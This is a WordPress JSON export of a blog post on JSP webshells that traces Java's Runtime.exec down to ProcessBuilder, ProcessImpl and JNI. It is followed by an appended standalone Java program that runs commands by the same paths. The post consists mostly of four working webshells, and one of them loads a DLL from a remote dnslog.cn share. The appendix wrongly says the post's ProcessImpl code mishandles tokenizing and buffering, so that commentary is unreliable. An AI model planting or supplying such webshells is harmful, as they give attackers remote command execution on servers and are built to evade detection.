{"id":248,"date":"2022-02-20T10:37:24","date_gmt":"2022-02-20T02:37:24","guid":{"rendered":"https:\/\/aaaahui.top\/?p=248"},"modified":"2022-08-13T21:26:14","modified_gmt":"2022-08-13T13:26:14","slug":"jsp-webshell","status":"publish","type":"post","link":"https:\/\/ahui.blog\/index.php\/2022\/02\/20\/jsp-webshell\/","title":{"rendered":"Tracing the Runtime class's exec method to its underlying implementation, and several forms of JSP webshell"},
"content":{"rendered":"<p><strong>There are many ways to implement a JSP webshell. This post covers only the variants that tracing the Runtime.exec method suggests; later posts will cover other techniques.<\/strong><br \/>\nFirst, the most basic form: executing an arbitrary command through the Runtime class's exec method:<\/p>\n<pre><code class=\"language-java\">&lt;%\n    String cmd = request.getParameter(&quot;cmd&quot;);\n    \/\/ exec(String) splits cmd on whitespace and hands the array to ProcessBuilder\n    java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();\n    byte[] b = new byte[2048];\n    int n;\n    out.print(&quot;&lt;pre&gt;&quot;);\n    \/\/ print only the bytes read this iteration, not the whole (partly stale) buffer\n    while((n = in.read(b)) != -1){\n        out.print(new String(b, 0, n));\n    }\n    out.print(&quot;&lt;\/pre&gt;&quot;);\n%&gt;<\/code><\/pre>\n<p>Next, the same thing through reflection on the Runtime class. The Runtime constructor is private, so the shell uses getDeclaredConstructor plus setAccessible(true) to build its own instance instead of calling the public getRuntime():<\/p>\n<pre><code class=\"language-java\">&lt;%\n    String cmd = request.getParameter(&quot;cmd&quot;);\n    Class clazz = Class.forName(&quot;java.lang.Runtime&quot;);\n    \/\/ Runtime() is private; reflection bypasses that instead of calling getRuntime()\n    java.lang.reflect.Constructor constructor = clazz.getDeclaredConstructor();\n    constructor.setAccessible(true);\n    Object runtime = constructor.newInstance();\n    java.lang.reflect.Method exec = clazz.getMethod(&quot;exec&quot;, String.class);\n    Process p = (Process) exec.invoke(runtime, cmd);\n    java.io.InputStream in = p.getInputStream();\n    byte[] b = new byte[2048];\n    int n;\n    out.print(&quot;&lt;pre&gt;&quot;);\n    while((n = in.read(b)) != -1){\n        out.print(new String(b, 0, n));\n    }\n    out.print(&quot;&lt;\/pre&gt;&quot;);\n%&gt;<\/code><\/pre>\n<p>Now trace how Runtime.exec is implemented:<br \/>\n<img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219223707677.png\" alt=\"\" \/><\/p>\n<p>exec(String) tokenizes the command on whitespace, and every exec overload ends in exec(String[], String[], File), which wraps the arguments in a ProcessBuilder and calls its start method. Following into ProcessBuilder.start:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224057498.png\" alt=\"image-20220219224057498\" \/><\/p>\n<p>start returns whatever ProcessImpl.start returns. Following in:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224236200.png\" alt=\"image-20220219224236200\" \/><\/p>\n<p>Here a ProcessImpl instance is created. Following into its constructor:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224404447.png\" alt=\"image-20220219224404447\" \/><\/p>\n<p>The constructor ultimately calls the create method. Following in:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/02\/image-20220219224511767.png\" alt=\"image-20220219224511767\" \/><\/p>\n<p>This method creates the process with the Win32 function CreateProcess (I found that in the source comments; the method itself is native).<\/p>\n<p>So the underlying mechanism of exec is clear: in the end the command is executed by calling the Windows API through JNI (look JNI up if you are not familiar with it). Linux works the same way in principle: in JDK 8 the Unix counterpart is java.lang.UNIXProcess, whose native forkAndExec method forks and execs the child, and from JDK 9 that code lives in ProcessImpl itself.<\/p>\n<p>From this call chain it follows that a webshell can execute commands from the ProcessBuilder layer, from the ProcessImpl layer, or directly through JNI, never touching java.lang.Runtime at all. That is also the detection-relevant point: a rule that only matches Runtime.getRuntime().exec in JSP source misses all three.<\/p>\n<p>Here is one of them, a webshell that reflectively calls ProcessImpl.start. Two caveats: ProcessImpl.start takes the array as-is, without the whitespace splitting that Runtime.exec(String) performs, so a multi-word command has to be split into array elements; and on JDK 16 and later setAccessible(true) on a java.base internal throws InaccessibleObjectException unless the JVM was started with --add-opens java.base\/java.lang=ALL-UNNAMED (JDK 8 needs no flag):<\/p>\n<pre><code class=\"language-java\">&lt;%\n    \/\/ split on whitespace: ProcessImpl.start does not tokenize the way Runtime.exec(String) does\n    String[] cmd = request.getParameter(&quot;cmd&quot;).trim().split(&quot;\\\\s+&quot;);\n    Class clazz = Class.forName(&quot;java.lang.ProcessImpl&quot;);\n    java.lang.reflect.Method method = clazz.getDeclaredMethod(&quot;start&quot;, String[].class, java.util.Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);\n    \/\/ JDK 16+: fails with InaccessibleObjectException unless --add-opens java.base\/java.lang=ALL-UNNAMED\n    method.setAccessible(true);\n    \/\/ (cmdarray, environment = inherit, dir, redirects = pipes, redirectErrorStream = true)\n    Process p = (Process) method.invoke(null, cmd, null, &quot;.&quot;, null, true);\n    java.io.InputStream in = p.getInputStream();\n    byte[] b = new byte[2048];\n    int n;\n    out.print(&quot;&lt;pre&gt;&quot;);\n    while((n = in.read(b)) != -1){\n        out.print(new String(b, 0, n));\n    }\n    out.print(&quot;&lt;\/pre&gt;&quot;);\n%&gt;<\/code><\/pre>\n<p>And a webshell that loads a remote DLL over a UNC path and runs the command through a JNI native method. The JSP declares only the native signature. JNI binds it by symbol name: Java_ followed by the fully qualified class name (dots as _, $ as _00024) and _exec, and the servlet container chooses the outer class name when it compiles the page, so the DLL must either export exactly that mangled name or register its function from JNI_OnLoad with RegisterNatives, which makes the export name irrelevant:<\/p>\n<pre><code class=\"language-java\">&lt;%!\n    class JNI{\n        \/\/ implemented in the DLL loaded below\n        public native String exec(String str);\n    }\n%&gt;\n&lt;%\n    \/\/ System.load needs an absolute path; a UNC path to an SMB share qualifies on Windows\n    System.load(&quot;\\\\\\\\nprv9u.dnslog.cn\\\\exec.dll&quot;);\n    String cmd = request.getParameter(&quot;cmd&quot;);\n    JNI jni = new JNI();\n    String res = jni.exec(cmd);\n    out.println(res);\n%&gt;<\/code><\/pre>\n<p>Those are the webshell variants that follow from tracing the Runtime.exec method.<\/p>\n","protected":false},
"excerpt":{"rendered":"<p>There are many ways to implement a JSP webshell. This post covers only the variants that tracing the Runtime.exec method suggests; later posts will &#8230; <a title=\"Tracing the Runtime class's exec method to its underlying implementation, and several forms of JSP webshell\" class=\"read-more\" href=\"https:\/\/ahui.blog\/index.php\/2022\/02\/20\/jsp-webshell\/\" aria-label=\"Continue reading Tracing the Runtime class's exec method to its underlying implementation, and several forms of JSP webshell\">Read more<\/a><\/p>\n","protected":false},
"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[17],"class_list":["post-248","post","type-post","status-publish","format-standard","hentry","category-safety_research","tag-java"],"_links":{"self":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/comments?post=248"}],"version-history":[{"count":1,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions"}],"predecessor-version":[{"id":255,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/248\/revisions\/255"}],"wp:attachment":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/media?parent=248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/categories?post=248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/tags?post=248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
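The post says a webshell can be built from the ProcessBuilder layer but shows no code for it, and its ProcessImpl sample passes the command array through untokenized and prints a stale buffer. As an added example that is not part of the original post, the following standalone program (the class name ExecPaths and the default command whoami are my own choices) runs one command through the ProcessBuilder layer and, via reflection, through ProcessImpl.start, tokenizing the way Runtime.exec(String) does and reading output by the byte count actually returned:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.StringTokenizer;

// Added example, not code from the original post: the ProcessBuilder and
// ProcessImpl execution paths as a standalone program instead of a JSP.
public class ExecPaths {

    // Split a command line the way Runtime.exec(String) does internally
    // (StringTokenizer on whitespace). ProcessBuilder and ProcessImpl.start take
    // the array as-is, so "ipconfig /all" as one element would be looked up as a
    // single program name and fail.
    static String[] tokenize(String command) {
        StringTokenizer st = new StringTokenizer(command);
        String[] argv = new String[st.countTokens()];
        for (int i = 0; st.hasMoreTokens(); i++) {
            argv[i] = st.nextToken();
        }
        return argv;
    }

    // Read the child's output using the byte count returned by read(); the JSP
    // samples print the whole 2048-byte buffer each iteration, which leaks stale
    // bytes from earlier reads into the response.
    static String drain(Process p) throws IOException, InterruptedException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (InputStream in = p.getInputStream()) {
            byte[] b = new byte[2048];
            int n;
            while ((n = in.read(b)) != -1) {
                buf.write(b, 0, n);
            }
        }
        p.waitFor();
        return new String(buf.toByteArray());
    }

    // Path 1: ProcessBuilder, the class Runtime.exec delegates to.
    // redirectErrorStream(true) merges stderr into stdout so errors are captured too.
    static String viaProcessBuilder(String command) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(tokenize(command)).redirectErrorStream(true).start();
        return drain(p);
    }

    // Path 2: ProcessImpl.start through reflection, one layer below ProcessBuilder.
    // Signature as in java.lang.ProcessImpl (JDK 8 and later):
    //   static Process start(String[] cmdarray, Map<String,String> environment, String dir,
    //                        ProcessBuilder.Redirect[] redirects, boolean redirectErrorStream)
    static String viaProcessImpl(String command) throws Exception {
        Class<?> clazz = Class.forName("java.lang.ProcessImpl");
        Method start = clazz.getDeclaredMethod("start", String[].class, java.util.Map.class,
                String.class, ProcessBuilder.Redirect[].class, boolean.class);
        // JDK 16+: throws InaccessibleObjectException unless the JVM was started with
        // --add-opens java.base/java.lang=ALL-UNNAMED; JDK 8 needs no flag.
        start.setAccessible(true);
        // environment null = inherit the parent's; redirects null = pipes
        Process p = (Process) start.invoke(null, tokenize(command), null, ".", null, true);
        return drain(p);
    }

    public static void main(String[] args) throws Exception {
        // default command is an assumption of this example
        String command = args.length > 0 ? String.join(" ", args) : "whoami";
        System.out.println("[ProcessBuilder]\n" + viaProcessBuilder(command));
        try {
            System.out.println("[ProcessImpl]\n" + viaProcessImpl(command));
        } catch (RuntimeException e) {
            // InaccessibleObjectException (JDK 9+) is a RuntimeException
            System.out.println("[ProcessImpl] blocked by the module system: " + e);
        }
    }
}
```

Run it with `java ExecPaths.java whoami` on JDK 11 or later (compile first on JDK 8). On JDK 16 and later add `--add-opens java.base/java.lang=ALL-UNNAMED` to reach ProcessImpl.start; without it the second path reports InaccessibleObjectException, which is the same restriction the ProcessImpl JSP shell runs into on a modern JVM, while the ProcessBuilder path needs no reflection and works everywhere.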